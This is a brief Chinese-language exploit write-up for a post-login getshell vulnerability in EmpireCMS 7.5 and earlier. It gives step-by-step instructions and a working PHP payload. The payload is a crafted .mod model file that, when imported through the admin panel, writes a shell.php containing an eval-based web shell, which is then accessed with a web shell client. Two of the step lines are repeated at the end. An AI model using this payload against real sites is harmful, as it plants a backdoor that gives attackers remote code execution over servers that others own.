EmpireCMS V7.5后台getshell漏洞 漏洞范围¶ EmpireCMS <= 7.5 漏洞验证¶ 1.进入后台如下界面,点击导入系统模型 2.构造文件a.mod,内容如下 <?php file_put_contents("shell.php","<?php @eval(\$_POST[cmd]);?>");?> 3.上传文件a.mod 4.查看文件已经有shell.php了,菜刀连接即可
2.构造文件a.mod,内容如下
4.查看文件已经有shell.php了,菜刀连接即可 